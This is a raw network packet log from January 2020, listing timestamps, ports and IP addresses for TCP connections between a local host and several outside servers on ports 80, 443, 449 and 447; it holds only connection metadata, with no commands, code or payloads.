Jan 20, 2020 14:13:55.544826031 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.544938087 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.544939995 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.545012951 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.545056105 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.545072079 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.545101881 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.545190096 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.545192003 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.545309067 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.545314074 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.545422077 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.545430899 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.545541048 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.545547009 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.545556068 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.545666933 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.545666933 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.545789003 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.545795918 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.545912981 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.545921087 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.546036959 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.546051979 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.546066999 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.546176910 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.546185017 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.546216011 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.546295881 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.546335936 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.546399117 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.546452999 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.546468019 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.546483994 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.546571016 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.546586990 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.546699047 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.546710014 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.546801090 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.546825886 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.546916962 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.546917915 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.546932936 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.547044992 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.547061920 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.547175884 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.547178030 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.547291040 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.547297955 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.547408104 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.547425032 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.547435999 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.547529936 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.547533035 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.547641993 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.547653913 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.547781944 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.547873974 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.548064947 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.548165083 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.548240900 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.548275948 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.548382044 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.548393011 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.548398972 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.548455000 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.548510075 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.548558950 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.548646927 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.548738003 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.548753023 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.548866987 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.548867941 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.548993111 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.549048901 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.549071074 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.549179077 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.549179077 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.549185991 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.549195051 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.549307108 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.570115089 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.570267916 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.570307970 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.570329905 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.570359945 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.570379972 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.570415974 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.570561886 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.570574999 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.570624113 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.570647001 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.570756912 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.570765018 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.570835114 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.570856094 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.570872068 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.570966005 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.570976019 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.571167946 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.571197033 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.571265936 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.571286917 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.571394920 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.571403980 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.571420908 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.571453094 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.571477890 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.571532011 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.571615934 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.571623087 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.571731091 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.571732044 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.571779013 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.571914911 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.571923018 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.571934938 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.572081089 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.596394062 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.596693039 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.597242117 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.597274065 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.597311020 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.597336054 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.597373009 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.597543955 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.597551107 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.597582102 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.597590923 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.597596884 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.597680092 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.597704887 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.597713947 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.597759008 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.597812891 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.597835064 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.597929001 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.597980976 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.598000050 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.598040104 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.598170996 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.598181963 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.598220110 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.598243952 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.598371983 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.598423958 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.598480940 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.598494053 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.598556995 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.598659992 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.598772049 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.598858118 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.598882914 CET	80	49186	185.195.237.14	192.168.0.40
Jan 20, 2020 14:13:55.598903894 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.599004984 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:55.599049091 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:13:59.229332924 CET	49186	80	192.168.0.40	185.195.237.14
Jan 20, 2020 14:15:18.379628897 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:15:18.718317986 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:15:18.718482971 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:15:18.729062080 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:15:19.067847967 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:15:19.069437981 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:15:19.069462061 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:15:19.069809914 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:15:19.093926907 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:15:19.433506966 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:15:19.631627083 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:15:31.691504002 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:15:32.075325966 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:15:35.438240051 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:15:35.646725893 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:05.333307028 CET	49188	443	192.168.0.40	54.204.26.223
Jan 20, 2020 14:16:05.333349943 CET	443	49188	54.204.26.223	192.168.0.40
Jan 20, 2020 14:16:05.333451033 CET	49188	443	192.168.0.40	54.204.26.223
Jan 20, 2020 14:16:05.333848953 CET	49188	443	192.168.0.40	54.204.26.223
Jan 20, 2020 14:16:05.333875895 CET	443	49188	54.204.26.223	192.168.0.40
Jan 20, 2020 14:16:05.717243910 CET	443	49188	54.204.26.223	192.168.0.40
Jan 20, 2020 14:16:05.717439890 CET	49188	443	192.168.0.40	54.204.26.223
Jan 20, 2020 14:16:05.724584103 CET	49188	443	192.168.0.40	54.204.26.223
Jan 20, 2020 14:16:05.724615097 CET	443	49188	54.204.26.223	192.168.0.40
Jan 20, 2020 14:16:05.724865913 CET	443	49188	54.204.26.223	192.168.0.40
Jan 20, 2020 14:16:05.732031107 CET	49188	443	192.168.0.40	54.204.26.223
Jan 20, 2020 14:16:05.773921967 CET	443	49188	54.204.26.223	192.168.0.40
Jan 20, 2020 14:16:05.825562000 CET	443	49188	54.204.26.223	192.168.0.40
Jan 20, 2020 14:16:06.026989937 CET	443	49188	54.204.26.223	192.168.0.40
Jan 20, 2020 14:16:06.027184963 CET	49188	443	192.168.0.40	54.204.26.223
Jan 20, 2020 14:16:06.027333975 CET	49188	443	192.168.0.40	54.204.26.223
Jan 20, 2020 14:16:06.027357101 CET	443	49188	54.204.26.223	192.168.0.40
Jan 20, 2020 14:16:06.027411938 CET	49188	443	192.168.0.40	54.204.26.223
Jan 20, 2020 14:16:06.027422905 CET	443	49188	54.204.26.223	192.168.0.40
Jan 20, 2020 14:16:06.028420925 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:06.369923115 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:18.849003077 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:18.849029064 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:18.849252939 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:19.116797924 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:19.455585957 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:23.728501081 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:23.731566906 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:24.070215940 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:27.352417946 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:27.562237978 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:29.753349066 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:29.753662109 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:30.093786001 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:30.094042063 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:30.094726086 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:30.095278978 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:30.433316946 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:30.433677912 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:30.433971882 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:30.434273005 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:30.434508085 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:30.434820890 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:30.434854984 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:30.773457050 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:30.773482084 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:30.773919106 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:30.774164915 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:30.774184942 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:30.774389982 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:31.113185883 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.113209963 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.115803957 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.115825891 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.115840912 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.115855932 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.116548061 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.179755926 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.384322882 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:31.385231018 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:31.386477947 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:31.386550903 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:31.386583090 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:31.386630058 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:31.386687040 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:31.386708021 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:31.386737108 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:31.724231958 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.725783110 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.725806952 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.725822926 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.726604939 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.726629972 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.726644039 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.726659060 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.727227926 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.727245092 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.727258921 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.727273941 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.727852106 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.727868080 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.727881908 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.728735924 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:31.812542915 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:35.658766031 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:35.740297079 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:36.079622984 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:42.851366997 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:42.852794886 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:43.191612959 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:54.002302885 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:16:54.122298002 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:16:54.461627960 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:17:13.085618973 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:17:13.300360918 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:18:18.084934950 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:18:18.084958076 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:18:18.085330009 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:18:18.085376024 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:18:18.085410118 CET	49187	449	192.168.0.40	181.129.104.139
Jan 20, 2020 14:18:18.424693108 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:18:18.424715996 CET	449	49187	181.129.104.139	192.168.0.40
Jan 20, 2020 14:19:03.794843912 CET	49189	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:03.794903040 CET	443	49189	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:03.795061111 CET	49189	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:03.799529076 CET	49189	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:03.799552917 CET	443	49189	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:03.866270065 CET	443	49189	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:03.866641045 CET	49189	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:03.881618977 CET	49189	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:03.881649971 CET	443	49189	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:03.882333994 CET	443	49189	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:03.899075031 CET	49189	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:03.941966057 CET	443	49189	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:18.102314949 CET	443	49189	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:18.302557945 CET	443	49189	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:18.302753925 CET	49189	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:18.303006887 CET	49189	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:18.303028107 CET	443	49189	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:18.303040981 CET	49189	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:18.303054094 CET	443	49189	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:18.669429064 CET	49190	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:18.669485092 CET	443	49190	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:18.669586897 CET	49190	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:18.669779062 CET	49190	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:18.669801950 CET	443	49190	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:18.725155115 CET	443	49190	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:18.725661039 CET	49190	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:18.725682974 CET	443	49190	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:18.726852894 CET	49190	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:18.726883888 CET	443	49190	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:25.435887098 CET	443	49190	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:25.635088921 CET	443	49190	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:25.635462999 CET	49190	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:25.635736942 CET	49190	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:25.635756969 CET	443	49190	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:25.635858059 CET	49190	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:25.635868073 CET	443	49190	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:25.635886908 CET	49190	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:25.635894060 CET	443	49190	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:25.870848894 CET	49191	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:25.870892048 CET	443	49191	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:25.871012926 CET	49191	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:25.871206999 CET	49191	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:25.871226072 CET	443	49191	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:25.923607111 CET	443	49191	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:25.924123049 CET	49191	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:25.924139023 CET	443	49191	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:25.924916029 CET	49191	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:25.924926996 CET	443	49191	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:30.836425066 CET	443	49191	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:30.858969927 CET	49191	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:30.860779047 CET	49192	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:30.860833883 CET	443	49192	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:30.861049891 CET	49192	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:30.861315966 CET	49192	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:30.861340046 CET	443	49192	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:30.915477037 CET	443	49192	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:30.916167021 CET	49192	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:30.916201115 CET	443	49192	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:30.917314053 CET	49192	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:19:30.917345047 CET	443	49192	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:36.511254072 CET	443	49192	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:36.710537910 CET	443	49192	5.2.78.43	192.168.0.40
Jan 20, 2020 14:19:36.710737944 CET	49192	443	192.168.0.40	5.2.78.43
Jan 20, 2020 14:20:17.536416054 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:17.555870056 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:17.556224108 CET	49193	447	192.168.0.40	185.62.189.249
